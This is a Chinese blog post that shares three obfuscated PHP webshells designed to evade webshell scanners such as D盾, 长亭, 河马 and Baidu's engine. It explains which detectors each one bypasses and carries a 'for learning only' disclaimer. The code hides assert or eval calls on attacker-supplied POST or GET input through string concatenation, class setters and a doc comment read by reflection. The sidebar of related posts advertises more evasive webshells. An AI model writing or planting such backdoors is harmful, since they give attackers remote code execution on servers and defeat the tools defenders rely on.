过D盾php webshell免杀马探讨

已于 2022-07-19 18:01:33 修改
阅读量1.6k 收藏 3
点赞数 1
分类专栏: 免杀 安全 文章标签: 安全 前端 javascript
于 2022-07-19 18:00:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33942040/article/details/125877740
版权

前言:

本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任

最近有在系统的总计waf绕过内容和后缀的绕过,把以前别的师傅发过的很多东西做了一些总结
在这个过程中发觉了其实webshell的bypass手法还是蛮多的
后缀bypass总结完了 经过实战也绕过了很多家最新的waf后缀
内容的还没写完 东西有点多
image.png
这里就分享一些php免杀的马 全过的也有贼多 但是暂时就不分享了

版本限制

使用条件:版本<7.1可用

这里发的是除了百度以外全过的(当然有全过的 但是暂时不会发出来)

马内容:
<?php

class get{
        public $x="";
        public $y="";
        public function setName($name=1){
                return $this -> name = $name;
        }
}
$obj = new get();
$s = $obj -> setName($name="ass");
$s = $s."ert";
$a = " $_POST[1]";
$b=null;
$s($b.$a);
?>
bypass情况:

最新版D盾
image.png
长亭
image.png

百度家的没过
image.png
在线的 这个不建议使用 效果就离普 其他都能查出的他不行
image.png
河马
image.png

版本未限制的

马1(这个只过了d盾 不太理解这个d盾为啥不查)

内容:

<?php  
    /**   
    * assert($_GET[1+0]);
    */  
    class User { }  
    $user = new ReflectionClass('User');
    $comment = $user->getDocComment();
    $d = substr($comment , 14 , 20);
    eval($d);
?>

image.png
d盾
image.png
长亭
image.png
百度
image.png

河马也不过
image.png

马2

马内容:

<?php
class get{
        public $x="";
        public $y="";
        
        public function setName($name=1){
                return $this -> name = $name;
        }
}
$obj = new get();
$s = $obj -> setName($name="$_POST[1]");
eval($s);

bypass情况:
除百度其他的都过了
image.png
d盾
image.png
长亭的
image.png
百度
image.png
河马
image.png

goddemon
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
渗透测试-过D盾一句话+上传小
lza20001103的博客
08-29 1313
D盾一句话+上传小 文章目录过D盾一句话+上传小前言方式一PHP一句话方式二PHP上传小 前言 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。 方式一 PHP一句话 1.代码 <?php class
php webshell免杀初探_2024最新php免杀大马(1),2024年最新腾讯T2大牛手把手教你
最新发布
2401_83973943的博客
04-13 473
长亭百川WebShell查杀引擎:通过webshell加载器进行绕过,实战中不知道是否可行。(可能要加入不死机制?本体.php加载器。
的反挂检测及精确投放(免杀
leeeryan
01-10 1001
前天shadow在群里提到或许可以采取一些方法来实现对挂检测系统的绕过,遂与其深入探讨了下,事后又考虑到网的精确投放,总结了一些点做了点儿技术实现 ,并在这里简单记录下想到的一些想法,欢迎其他大牛不吝指教。1、通过判断客户端安装程序指定挂这个是个老早的话题,早在两年前cos他们就在xkungfoo议题上提到过了:通过img标签远程域检测本地域软件是否存在 。当然还可以通过其他方式,譬如判断目标组件是否可被调用等。这样做主要有几方面原因:一是对于某些搞不定的杀毒软件、防火墙或hips直接采取绕过的
PHP一句话木免杀学习
qq_45780190的博客
05-11 3052
PHP一句话木免杀学习 简单了解php一句话木原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木的变形 常用变形函数 convert_uudecode() #解码一个
免杀学习——PHP免杀
ZxC789456302的博客
10-23 1747
php免杀,理论上是只要绕过waf就可以,但特殊情况下存在驻场人员手动监控,看到一些奇怪的参就直接给你ban了,所以各位师傅尽量不要在一些敏感时期进行渗透测试,仅用于技术学习推荐大家去看一下这位师傅的文章php免杀合集 - 跳跳糖 (tttang.com),里面还有一些扩展,十分详细。
D盾-webshell检测必备工具
07-09
D盾的功能比较强大, 最常见使用方式包括如下功能:1、查杀webshell,隔离可疑文件;2、端口进程查看、base64解码以及克隆账号检测等辅助工具;3、文件监控。第一个是D盾的主要功能,后面功能是D盾的辅助功能,但是...
2016最新php免杀webshell安全
03-05
【标题】"2016最新php免杀webshell安全狗" 描述了这个压缩包文件中的PHP脚本能够避开安全狗等Web安全防护软件的检测,从而在2016年时被认为是可以成功上传并执行的WebshellWebshell通常是指攻击者通过SQL注入、...
webshell-venom-master一些免杀
04-13
Webshell Venom Master中的免杀是指设计时考虑了这些技术,以提高其在目标环境中的生存能力。 3. **编程语言**:Webshell Venom Master包含了多种编程语言的Webshell示例,如PHP、Python、ASP、JSP等。每种语言都...
PHP免杀的浅谈[过最新D盾]1
08-03
这篇文章主要探讨的是如何在PHP环境中创建“小”(webshell)并使其免于被安全软件如D盾检测。PHP通常是指一种恶意代码,允许攻击者远程控制被入侵的服务器,执行任意PHP命令。文章中提到了两种绕过D盾检测的...
PHP常见过waf webshell以及最简单的检测方法
10-16
主要给大家介绍了关于PHP常见过waf webshell以及最简单的检测方法,文中通过示例代码介绍的非常详细,对大家学习或者使用PHP具有一定的参考学习价值,需要的朋友们下面来一起学习学习吧
php大马过waf
04-28
php大马过waf,,......................................................................................................
免杀php大马
03-03
过目前所有市面的各类防御,仅供参考。切勿用于非法途径。
aether_upload.7z
02-06
php文件上传框架,基于laravel
php免杀大马
07-12
常用的php大马,可提权反弹。 常用提权大马常用的php大马,可提权反弹。 常用提权大马
d盾asp webshell+冰蝎免杀探讨
goddemon
07-19 2223
正文asp免杀的手法其实也蛮多的个人理解其实免杀核心就是混淆+改变执行顺序啥的。对于asp而言,前者的利用特征这些进行绕后者就是利用函数数组+类的手法个人后者的手法用的最多一样吧这里先扔2个bypass的小。...
浅谈PHP大马免杀之如何过狗过宝塔过阿里云D盾
iphp666的博客
09-17 2784
PHP免杀方法有很多,加密混淆字符转换拆分等等都可以达到目的,下面来简单介绍几种免杀PHP大马的方法,一句话思路也是一样 拿我很喜欢的一款php大马来示范,这个支持cmd命令,编辑文件不会空白,界面非常经典,最重要的是支持php7,高音甜中音准低音沉,总之一句话,就是通透! <?php $password='haha';//登录密码 //----------功能程序-----------...
一键免杀D盾(webshell-venom 3.0 发布) ——yzddMr6
yzddMr6的博客
11-06 1753
前言 我承诺过300个星后放出3.0 项目地址: https://github.com/yzddmr6/webshell-venom webshell-venom 3.0 更新特点: 1. 修复已知问题:宝塔在遇到header404时会解析到他的404模版上而不是shell上导致无法连接,故去除头部的404,如有需要自行添加 2. 变量全员随机化,不再有固定的变量名称 3. 增...
webshell免杀
03-16
WebShell 免杀指的是让 WebShell 在网站管理员或安全软件扫描时不被检测到或误判为恶意软件。这可以通过混淆、加密或隐藏 WebShell 的代码来实现。但是需要注意的是,这并不能保证 WebShell 不会被发现或清除,并且使用 WebShell 也是非法的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值